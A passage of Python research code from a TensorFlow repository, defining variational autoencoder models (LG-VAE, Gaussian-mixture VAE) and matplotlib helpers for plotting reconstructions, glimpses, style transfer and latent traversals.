# ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
# ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
plt.imshow(canvas)
if filename is None:
plt.savefig(filepath + 'x_reconstrcution_bbox.png')
else:
plt.savefig(filepath + 'x_reconstrcution_bbox' + filename + '.png', dpi=300)
# plt.close()
return plt
def glimpses_reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
# Glimpses
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid,
all_glimpses, obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *more_outputs) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
object_size = obj_recon_alpha.shape[2]
f, ax = plt.subplots(1, 3)
ax[0].set_xticks(np.arange(0, object_size*n, object_size))
ax[0].set_yticks(np.arange(0, object_size*num_cells, object_size))
ax[1].set_xticks(np.arange(0, object_size*n, object_size))
ax[1].set_yticks(np.arange(0, object_size*num_cells, object_size))
ax[2].set_xticks(np.arange(0, object_size*n, object_size))
ax[2].set_yticks(np.arange(0, object_size*num_cells, object_size))
# plot glimpses
canvas_glimpses = np.empty((object_size*num_cells, object_size*n, channel))
canvas_glimpses_recon = np.empty((object_size*num_cells, object_size*n, channel))
canvas_glimpses_alpha = np.zeros((object_size*num_cells, object_size*n))
for i in range(n):
canvas_glimpses[:,i*object_size:(i+1)*object_size,:] = all_glimpses[i].numpy().reshape((num_cells*object_size,object_size,channel))
canvas_glimpses_recon[:,i*object_size:(i+1)*object_size,:] = obj_recon_unnorm[i].numpy().reshape((num_cells*object_size,object_size,channel))
canvas_glimpses_alpha[:,i*object_size:(i+1)*object_size] = obj_recon_alpha[i].numpy().reshape((num_cells*object_size,object_size))
ax[0].imshow(np.squeeze(canvas_glimpses),cmap='gray')
ax[0].set_title('Glimpses')
ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[1].imshow(np.squeeze(canvas_glimpses_recon),cmap='gray')
ax[1].set_title('Glimpses reconstruction')
ax[1].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[1].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[2].imshow(np.squeeze(canvas_glimpses_alpha), cmap='viridis') #,cmap='gray'
ax[2].set_title('Glimpses alpha')
ax[2].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[2].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
if filename is None:
plt.savefig(filepath + 'glimpses.png')
else:
plt.savefig(filepath + 'glimpses' + filename + '.png', dpi=300)
# plt.close()
return plt
def glimpses_local_reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
# Glimpses
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid, all_glimpses,
obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, z_bg, z_bg_mean, z_bg_sig, x_hat_recon, z_l, z_l_mean, z_l_sig, x_hat) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
object_size = obj_recon_alpha.shape[2]
f, ax = plt.subplots(1, 2)
ax[0].set_xticks(np.arange(0, object_size*n, object_size))
ax[0].set_yticks(np.arange(0, object_size*num_cells, object_size))
ax[1].set_xticks(np.arange(0, object_size*n, object_size))
ax[1].set_yticks(np.arange(0, object_size*num_cells, object_size))
# plot glimpses
canvas_glimpses = np.empty((object_size*num_cells, object_size*n, channel))
canvas_glimpses_recon = np.empty((object_size*num_cells, object_size*n, channel))
for i in range(n):
canvas_glimpses[:,i*object_size:(i+1)*object_size,:] = x_hat[i].numpy().reshape((num_cells*object_size,object_size,channel))
canvas_glimpses_recon[:,i*object_size:(i+1)*object_size,:] = x_hat_recon[i].numpy().reshape((num_cells*object_size,object_size,channel))
ax[0].imshow(np.squeeze(canvas_glimpses),cmap='gray')
ax[0].set_title('Glimpses')
ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[1].imshow(np.squeeze(canvas_glimpses_recon),cmap='gray')
ax[1].set_title('Glimpses reconstruction')
ax[1].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[1].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
if filename is None:
plt.savefig(filepath + 'glimpses_local.png')
else:
plt.savefig(filepath + 'glimpses_local' + filename + '.png', dpi=300)
# plt.close()
return plt
def x_hat_reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid, all_glimpses,
obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *_, x_hat_recon, z_l, z_l_mean, z_l_sig) = model(x_test)
canvas_x_hat = np.empty((h*2, w*n, channel))
for i in range(n):
canvas_x_hat[0:h,i*w:(i+1)*w, :] = x_hat_recon[i].numpy().reshape((h,w,channel))
canvas_x_hat[h:h*2, i*w:(i+1)*w, :] = images[i,:,:,3:]
plt.figure(figsize=(2*n,2))
plt.imshow(canvas_x_hat)
if filename is None:
plt.savefig(filepath + 'x_hat_reconstrcution_test_lg_vae.png')
else:
plt.savefig(filepath + 'x_hat_reconstrcution_test' + filename + '.png')
plt.close()
return canvas_x_hat
```
#### File: split/vae/model.py
```python
import tensorflow as tf
import tensorflow.keras.layers as layers
from tensorflow.keras.layers import Dense, Conv2D, BatchNormalization, Flatten, Dropout
from tensorflow.keras import Model
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
class Sampling(layers.Layer):
def call(self, inputs):
z_mean, z_sig = inputs
epsilon = tf.random.normal(shape=z_sig.shape, mean=0, stddev=1, dtype=tf.float32)
return z_mean + z_sig * epsilon
class Encoder(layers.Layer):
def __init__(self, latent_dims = 32, variational = True, type = 'conv', y_size=None, tau=None):
super(Encoder, self).__init__()
self.variational = variational
self.latent_dims = latent_dims
self.flatten = Flatten()
self.tau = tau
if type=='fc':
self.e1 = Dense(1024, activation = 'relu')
self.e2 = Dense(512, activation = 'relu')
if variational:
self.e3_mean = Dense(latent_dims, activation = None)
self.e3_sd = Dense(latent_dims, activation = None)
self.sampling = Sampling()
else:
self.e3 = Dense(latent_dims, activation = 'relu')
self.call = self.call_fc
elif type == 'conv': #always variational
if self.variational:
self.e1 = Conv2D(filters = 32, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.e2 = Conv2D(filters = 64, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.e3 = Conv2D(filters = 128, kernel_size = 4, strides = 2, padding='same', activation = 'relu')
self.e4_mean = Dense(latent_dims, activation = None)
self.e4_sd = Dense(latent_dims, activation = 'softplus') #, kernel_initializer=tf.initializers.TruncatedNormal(),bias_initializer=tf.keras.initializers.constant(-1)
self.sampling = Sampling()
self.call = self.call_conv
else:
raise NotImplemented('Deterministic convolution autoencoder not implemented')
elif type == 'gmvae':
self.h_block = tf.keras.Sequential([
Conv2D(filters = 128, kernel_size = 6, strides = 2, padding='same', activation = 'elu'),
Conv2D(filters = 128, kernel_size = 6, strides = 2, padding='same', activation = 'elu'),
Conv2D(filters = 128, kernel_size = 4, strides = 2, padding='same', activation = 'elu')])
self.y_block = tf.keras.Sequential([
Dense(1024, activation='elu'),
Dropout(rate=0.2),
Dense(128, activation='elu'),
])
self.do1 = Dropout(rate=0.2)
self.y_dense = Dense(y_size, activation=None, name='y_dense')
# Z prior block
self.do2 = Dropout(rate=0.2)
self.h_top_dense = Dense(512, activation='elu')
self.do3 = Dropout(rate=0.2)
self.z_prior_mean = Dense(latent_dims, activation=None, name='z_prior_mean')
self.do4 = Dropout(rate=0.2)
self.z_prior_sig = Dense(latent_dims, activation='softplus', name='z_prior_sig', bias_initializer=tf.keras.initializers.constant(1)) # kernel_initializer=tf.initializers.TruncatedNormal(),bias_initializer=tf.keras.initializers.constant(1))
#Encoder block
self.do5 = Dropout(rate=0.2)
self.e1 = Dense(512,activation='elu')
self.do6 = Dropout(rate=0.1)
self.z_mean = Dense(latent_dims,activation=None)
self.do7 = Dropout(rate=0.1)
self.z_sig = Dense(latent_dims,activation='softplus', bias_initializer=tf.keras.initializers.constant(1)) #kernel_initializer=tf.initializers.TruncatedNormal(),bias_initializer=tf.keras.initializers.constant(1))
self.sampling = Sampling()
self.call = self.call_gmvae
else:
raise Exception('Type undefined')
def call_fc(self, x, training=False):
# x = tf.reshape(x, [-1,28*28])
x = self.flatten(x)
# print(x.shape)
x = self.e1(x)
x = self.e2(x)
if self.variational:
z_mean = self.e3_mean(x)
z_log_var = self.e3_sd(x)
z = self.sampling((z_mean,z_log_var))
return z, z_mean, z_log_var
else:
z = self.e3(x)
return z
def call_conv(self, x, training=False):
# x = tf.reshape(x, [-1,28,28,1])
# print('input shape:',x.shape)
x = self.e1(x)
x = self.e2(x)
x = self.e3(x)
# precode_size = np.prod(x.shape[1:])
# print('Precode shape:',x.shape)
# print('Precode size:',precode_size)
x = self.flatten(x)
z_mean = self.e4_mean(x)
z_sig = self.e4_sd(x)
z = self.sampling((z_mean,z_sig))
return z, z_mean, z_sig
def call_gmvae(self,x, training=False):
h = self.h_block(x)
h = self.flatten(h)
# y block
y_hidden = self.y_block(h)
y_logits = self.y_dense(y_hidden)
noise = tf.random.uniform(shape = y_logits.shape)
y = tf.nn.softmax( (y_logits - tf.math.log(-tf.math.log(noise))) / self.tau, axis=1) #gumbel softmax
z_prior_mean = self.z_prior_mean(y)
z_prior_sig = self.z_prior_sig(y)
h_top = self.h_top_dense(y)
h = self.e1(self.do5(h,training))
h = h + h_top
z_mean = self.z_mean(h)
z_sig = self.z_sig(h)
z = self.sampling((z_mean,z_sig))
return z, z_mean, z_sig, y, y_logits, z_prior_mean, z_prior_sig
def encode_y(self,y):
z_prior_mean = self.z_prior_mean(y)
z_prior_sig = self.z_prior_sig(y)
return z_prior_mean, z_prior_sig
class Decoder(layers.Layer):
def __init__(self, latent_dims = 32, image_shape = None, type='conv'):
super(Decoder, self).__init__()
self.latent_dims = latent_dims
self.image_shape = image_shape
self.type = type
self.d1 = Dense(self.image_shape[1]//8*self.image_shape[2]//8*128, activation = 'relu')
self.d2 = Conv2D(filters = 128, kernel_size = 4, strides = 1, padding='same', activation='relu')
self.d3 = Conv2D(filters = 64, kernel_size = 4, strides = 1, padding='same', activation='relu')
self.d4 = Conv2D(filters = 32, kernel_size = 6, strides = 1, padding='same', activation='relu')
self.d5 = Conv2D(filters = 6, kernel_size = 6, strides = 1, padding='same', activation=None)
def call(self, x):
# print('Code shape:',x.shape)
x = self.d1(x)
x = tf.reshape(x,[-1,self.image_shape[1]//8,self.image_shape[2]//8,128])
x = self.d2(x)
x = tf.image.resize(x,[self.image_shape[1]//4,self.image_shape[2]//4])
x = self.d3(x)
x = tf.image.resize(x,[self.image_shape[1]//2,self.image_shape[2]//2])
x = self.d4(x)
x = tf.image.resize(x,[self.image_shape[1],self.image_shape[2]])
x = self.d5(x)
return x[:,:,:,:3], x[:,:,:,3:] #x_mean, x_log_scale
class LGVae(Model):
def __init__(self, global_latent_dims, local_latent_dims, image_shape = None, variational = True, type = 'conv'):
super(LGVae, self).__init__()
# self.latent_dims = latent_dims
self.global_latent_dims = global_latent_dims
self.local_latent_dims = local_latent_dims
self.variational = variational
self.image_shape = image_shape
self.encoder_x = Encoder(latent_dims = global_latent_dims)
self.encoder_x_hat = Encoder(latent_dims = local_latent_dims)
self.decoder_x = Decoder(latent_dims = global_latent_dims + local_latent_dims, image_shape = image_shape) # use both z_g and z_l
self.decoder_x_hat = Decoder(latent_dims = local_latent_dims, image_shape = image_shape)
def call(self, inputs):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
# print(x.shape)
# print(x_hat.shape)
if self.variational:
z_x, z_mean_x, z_sig_x = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
return x_mean, x_log_scale, z_x, z_mean_x, z_sig_x, z_x_hat, x_hat_mean, x_hat_log_scale, z_mean_x_hat, z_sig_x_hat
#else:
raise NotImplementedError('Determiistic LG-AE not implemented')
def encode(self, inputs):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
if self.variational:
z_x, z_mean_x, z_sig_x = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
return z_x, z_x_hat
def decode(self, z_x, z_x_hat, rescale = True):
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
if rescale:
x_recon = tf.clip_by_value((x_mean + 1)*0.5,0.,1.)
x_hat_recon = tf.clip_by_value((x_hat_mean + 1)*0.5,0.,1.)
return x_recon, x_hat_recon
return x_mean, x_hat_mean
class LGGMVae(Model):
def __init__(self, global_latent_dims, local_latent_dims, image_shape, y_size, tau, variational = True, type = 'conv'):
super(LGGMVae, self).__init__()
# self.latent_dims = latent_dims
self.global_latent_dims = global_latent_dims
self.local_latent_dims = local_latent_dims
self.variational = variational
self.image_shape = image_shape
self.y_size = y_size
self.encoder_x = Encoder(latent_dims = global_latent_dims, type='gmvae', y_size=y_size, tau=tau)
self.encoder_x_hat = Encoder(latent_dims = local_latent_dims)
self.decoder_x = Decoder(latent_dims = global_latent_dims + local_latent_dims, image_shape = image_shape) # use both z_g and z_l
self.decoder_x_hat = Decoder(latent_dims = local_latent_dims, image_shape = image_shape)
def call(self, inputs, training=False):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
# print(x.shape)
# print(x_hat.shape)
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
return x_mean, x_log_scale, z_x, z_mean_x, z_sig_x, z_x_hat, x_hat_mean, x_hat_log_scale, z_mean_x_hat, z_sig_x_hat, y, y_logits, z_prior_mean, z_prior_sig
#else:
raise NotImplementedError('Determiistic LG-AE not implemented')
def encode(self, inputs):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
return z_x, z_x_hat
def decode(self, z_x, z_x_hat, rescale = True):
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
if rescale:
x_recon = tf.clip_by_value((x_mean + 1)*0.5,0.,1.)
x_hat_recon = tf.clip_by_value((x_hat_mean + 1)*0.5,0.,1.)
return x_recon, x_hat_recon
return x_mean, x_hat_mean
def encode_y(self, y, rescale = True):
z_prior_mean, z_prior_sig = self.encoder_x.encode_y(y)
return z_prior_mean, z_prior_sig
def get_y(self,x):
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
# print('y_logits.shape:', y_logits.shape)
return y, y_logits
class GMVae(Model):
def __init__(self, global_latent_dims, image_shape, y_size, tau, variational = True, type = 'conv'):
super(GMVae, self).__init__()
# self.latent_dims = latent_dims
self.global_latent_dims = global_latent_dims
self.variational = variational
self.image_shape = image_shape
self.y_size = y_size
self.encoder_x = Encoder(latent_dims = global_latent_dims, type='gmvae', y_size=y_size, tau=tau)
self.decoder_x = Decoder(latent_dims = global_latent_dims, image_shape = image_shape) # use both z_g and z_l
def call(self, inputs,training=False):
x = inputs[:,:,:,:3]
# print(x.shape)
# print(x_hat.shape)
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
x_mean, x_log_scale = self.decoder_x(z_x)
return x_mean, x_log_scale, z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig
#else:
raise NotImplementedError('Determiistic LG-AE not implemented')
def encode(self, inputs):
x= inputs[:,:,:,:3]
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
return z_x
def decode(self, z_x, rescale = True):
x_mean, x_log_scale = self.decoder_x(z_x)
if rescale:
x_recon = tf.clip_by_value((x_mean + 1)*0.5,0.,1.)
return x_recon
return x_mean
def encode_y(self, y, rescale = True):
z_prior_mean, z_prior_sig = self.encoder_x.encode_y(y)
return z_prior_mean, z_prior_sig
def get_y(self,x):
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
return y, y_logits
class Classifier(Model):
def __init__(self, latent_dims = 256, target_shape = None):
super(Classifier, self).__init__()
self.bn1 = BatchNormalization()
self.e1 = Conv2D(filters = 32, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.bn2 = BatchNormalization()
self.e2 = Conv2D(filters = 64, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.bn3 = BatchNormalization()
self.e3 = Conv2D(filters = 128, kernel_size = 4, strides = 2, padding='same', activation = 'relu')
self.bn3 = BatchNormalization()
self.e3 = Conv2D(filters = 256, kernel_size = 4, strides = 2, padding='same', activation = 'relu')
self.flatten = Flatten()
self.d1 = Dropout(0.25)
self.e4 = Dense(latent_dims, activation = 'relu')
self.d2= Dropout(0.25)
self.e5 = Dense(latent_dims//4, activation = 'relu')
self.d3 = Dropout(0.25)
self.e6 = Dense(target_shape, activation = None)
def call(self,x, training=False):
x = self.e1(self.bn1(x,training))
x = self.e2(self.bn2(x,training))
x = self.e3(self.bn3(x,training))
x = self.e4(self.d1(self.flatten(x),training))
x = self.e5(self.d2(x,training))
x = self.e6(self.d3(x,training))
# print('output shape:',x.shape)
return x
```
#### File: split/vae/visualizer.py
```python
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import tensorflow as tf
from model import LGGMVae
from scipy.io import loadmat
from collections import defaultdict
mpl.use('agg')
mpl.rcParams['figure.dpi'] = 300
mpl.rcParams['savefig.dpi'] = 300
def reconstruction_test_lg_vae(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
#Get a batch of test images
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
# x_recon, z_mean_x, z_log_var_x, x_hat_recon, z_mean_x_hat, z_log_var_x_hat = model(x_test)
z_x, z_x_hat = model.encode(x_test)
x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
canvas_x = np.empty((h*2, w*n, channel))
for i in range(n):
canvas_x[0:h,i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas_x[h:h*2, i*w:(i+1)*w, :] = (images[i,:,:,:3]+1)*0.5
plt.figure(figsize=(2*n,2))
plt.imshow(canvas_x)
if filename is None:
plt.savefig(filepath + 'x_reconstruction_test_lg_vae.png')
else:
plt.savefig(filepath + 'x_reconstruction_test' + filename + '.png')
plt.close()
canvas_x_hat = np.empty((h*2, w*n, channel))
for i in range(n):
canvas_x_hat[0:h,i*w:(i+1)*w, :] = x_hat_recon[i].numpy().reshape((h,w,channel))
canvas_x_hat[h:h*2, i*w:(i+1)*w, :] = (images[i,:,:,3:]+1)*0.5
plt.figure(figsize=(2*n,2))
plt.imshow(canvas_x_hat)
if filename is None:
plt.savefig(filepath + 'x_hat_reconstruction_test_lg_vae.png')
else:
plt.savefig(filepath + 'x_hat_reconstruction_test' + filename + '.png')
plt.close()
return canvas_x, canvas_x_hat
def style_transfer_test(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
#Hand-picked samples
idx = tf.constant([26,101,3025,3129,3182,3233,3547,3695,10462,10471,10601,10608,16171,16289,16593,16801,101,326,333,798,841,1189,6186,2651,1437,1826,5536],dtype=tf.int32)
test_data = loadmat('data/SVHN/test_32x32.mat')['X'].transpose((3,0,1,2)).astype(np.float32)/255.*2 - 1
rand_x_idx = tf.random.shuffle(idx)[:n]
rand_x_hat_idx = tf.random.shuffle(idx)[:n]
x = test_data[rand_x_idx.numpy()]
x_hat = test_data[rand_x_hat_idx.numpy()]
x_test = tf.concat([x,x_hat],axis=-1)
z_x, z_x_hat = model.encode(x_test)
x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
canvas_1 = np.empty((h*3, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
canvas_1[h:h*2, i*w:(i+1)*w, :] = (x_test[i,:,:,3:]+1)*0.5
canvas_1[h*2:h*3,i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'style_transfer.png')
else:
plt.savefig(filepath + 'style_transfer' + filename + '.png')
plt.close()
return canvas_1
def style_transfer_celeba(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images # [:n]
break
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
x = x_test[:n,:,:,:3].numpy()
x_hat = x_test[n:2*n,:,:,:3].numpy()
x_2 = tf.concat([x,x_hat],axis=-1)
x_aug = tf.concat([x_test[:n],x_2],axis=0)
z_x, z_x_hat = model.encode(x_aug)
x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
canvas_1 = np.empty((h*4, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_aug[i,:,:,:3]+1)*0.5
canvas_1[h:h*2, i*w:(i+1)*w, :] = (x_aug[i+n,:,:,3:]+1)*0.5
canvas_1[h*2:h*3,i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas_1[h*3:h*4,i*w:(i+1)*w, :] = x_recon[n+i].numpy().reshape((h,w,channel))
# plt.figure(figsize=(2*n,2))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'style_transfer_celeba.png')
else:
plt.savefig(filepath + 'style_transfer_celeba' + filename + '.png')
plt.close()
return canvas_1
def plot_latent_dims(model, dataset, variational = False):
z_list = [[] for dim in range(model.latent_dims)]
for images,_ in dataset:
if variational:
z,_,_ = model.encode(images)
else:
z = model.encode(images)
z = z.numpy()
for dim in range(z.shape[1]):
z_list[dim].extend(z[:,dim])
plt.figure()
plt.scatter(z_list[0],z_list[1],s=1)
if variational:
plt.savefig('output/2d_latent_var.png')
else:
plt.savefig('output/2d_latent_det.png')
plt.close()
for i,z in enumerate(z_list):
plt.figure()
plt.hist(z)
if variational:
plt.savefig('output/latent_var_'+str(i)+'.png')
else:
plt.savefig('output/latent_det_'+str(i)+'.png')
plt.close()
def generate(model, filename = None, filepath = None):
if isinstance(model,LGGMVae): #within a cluster
y = tf.one_hot(tf.random.uniform(shape = [1], minval = 0, maxval = model.y_size, dtype = tf.int32), depth = model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
z_g = tf.random.normal(shape = [100, model.global_latent_dims],mean=z_prior_mean, stddev=z_prior_sig)
z_l = tf.random.normal(shape = [100, model.local_latent_dims])
else:
z_g = tf.random.normal(shape=[100, model.global_latent_dims])
z_l = tf.random.normal(shape=[100, model.local_latent_dims])
x_generated,_ = model.decode(z_g,z_l,True)
h,w, channel = model.image_shape[1:4]
n = np.sqrt(100).astype(np.int32)
canvas = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas[i*h:(i+1)*h, j*w:(j+1)*w, :] = x_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generated_image.png')
else:
plt.savefig(filepath + filename + '.png')
plt.close()
return canvas
def generate_traverse(model):
if model.latent_dims != 2:
raise NotImplementedError('Implemented for 2D latent only')
z1_list = z2_list = np.linspace(-3,3,30)
z_list = [[z1,z2] for z1 in z1_list for z2 in z2_list]
generated_img = model.decode(tf.convert_to_tensor(z_list))
canvas = np.empty((h*30, w*30))
n = 30
for i in range(n):
for j in range(n):
canvas[i*h:(i+1)*h, j*w:(j+1)*w] = generated_img[i*n+j, :].numpy().reshape(h, w)
plt.figure(figsize=(8, 8))
plt.imshow(canvas, cmap='gray')
plt.savefig('output/latent_space.png')
plt.close()
def generate_varying_latent(model, vary , filename = None, filepath = None):
# assume top half of z is z_g and bottom is z_l
z_prior_mean, z_prior_sig = 0, 1
if isinstance(model,LGGMVae):
y = tf.one_hot(tf.random.uniform(shape = [1], minval = 0, maxval = model.y_size, dtype = tf.int32), depth = model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
#z2 is global
if vary=='lower':
z1 = tf.random.normal(shape = [100,model.local_latent_dims])
z2 = tf.random.normal(shape=[1, model.global_latent_dims],mean=z_prior_mean,stddev=z_prior_sig) #100 samples of z2s
z2 = tf.tile(z2, [100,1]) # repeat z1 100 times
x_generated, x_hat_generated = model.decode(z2,z1, True)
elif vary=='upper':
z1 = tf.random.normal(shape = [1,model.local_latent_dims])
z1 = tf.tile(z1, [100,1]) # repeat z1 100 times
z2 = tf.random.normal(shape=[100, model.global_latent_dims],mean=z_prior_mean,stddev=z_prior_sig) #100 samples of z2s
x_generated, x_hat_generated = model.decode(z2,z1, True)
else:
# z2 = tf.random.normal(shape = [100, model.latent_dims//2])
# z1 = tf.random.normal(shape = [1,model.latent_dims//2])
# z1 = tf.tile(z1, [100,1]) # .transpose(2,0,1).squeeze(1) # repeat z1 100 times
# z2 is global
if vary == 'lower':
# z = np.concatenate([z1,z2], axis=1)
z2 = tf.random.normal(shape = [1, model.global_latent_dims])
z1 = tf.random.normal(shape = [100,model.local_latent_dims])
z2 = tf.tile(z2, [100,1])
x_generated, x_hat_generated = model.decode(z2,z1, True)
elif vary == 'upper':
# z = np.concatenate([z2,z1], axis=1)
z2 = tf.random.normal(shape = [100, model.global_latent_dims])
z1 = tf.random.normal(shape = [1,model.local_latent_dims])
z1 = tf.tile(z1, [100,1])
x_generated,_ = model.decode(z2,z1, True)
h,w,channel = model.image_shape[1:4]
n = np.sqrt(100).astype(np.int32)
canvas_x = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas_x[i*h:(i+1)*h, j*w:(j+1)*w,:] = x_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas_x, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generate_varying_latent_' + vary + '.png')
else:
plt.savefig(filepath + filename + '.png')
plt.close()
if vary == 'lower':
canvas_x_hat = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas_x_hat[i*h:(i+1)*h, j*w:(j+1)*w,:] = x_hat_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas_x_hat, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generate_x_hat_' + vary + '.png')
else:
plt.savefig(filepath + 'x_hat_' + filename + '.png')
plt.close()
return canvas_x, canvas_x_hat
return canvas_x
def generate_cluster(model, vary, filename = None, filepath = None):
# For LGGMVAE
# Default to only vary zg
y = tf.one_hot(tf.random.uniform(shape = [1], minval = 0, maxval = model.y_size, dtype = tf.int32), depth = model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
if vary=='zg_zl':
z_g = tf.random.normal(shape = [10, model.global_latent_dims],mean=z_prior_mean, stddev=z_prior_sig)
z_g = tf.reshape(tf.tile(z_g,tf.convert_to_tensor([1,10])),[10*z_g.shape[0],z_g.shape[1]]) #repeat each elem 10 times
z_l = tf.random.normal(shape = [10, model.local_latent_dims])
z_l = tf.tile(z_l,tf.convert_to_tensor([10,1])) # repeat z_l 10 times
elif vary=='zg':
z_g = tf.random.normal(shape = [100, model.global_latent_dims],mean=z_prior_mean, stddev=z_prior_sig)
z_l = tf.random.normal(shape = [1,model.local_latent_dims])
z_l = tf.tile(z_l, [100,1]) # .transpose(2,0,1).squeeze(1) # repeat z1 100 times
elif vary=='y_zg':
y = tf.one_hot(tf.random.shuffle(tf.range(0,model.y_size))[:10], depth=model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
z_g = []
for mean, sig in zip(z_prior_mean, z_prior_sig):
z_g.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
z_g = tf.reshape(tf.stack(z_g),[100,model.global_latent_dims])
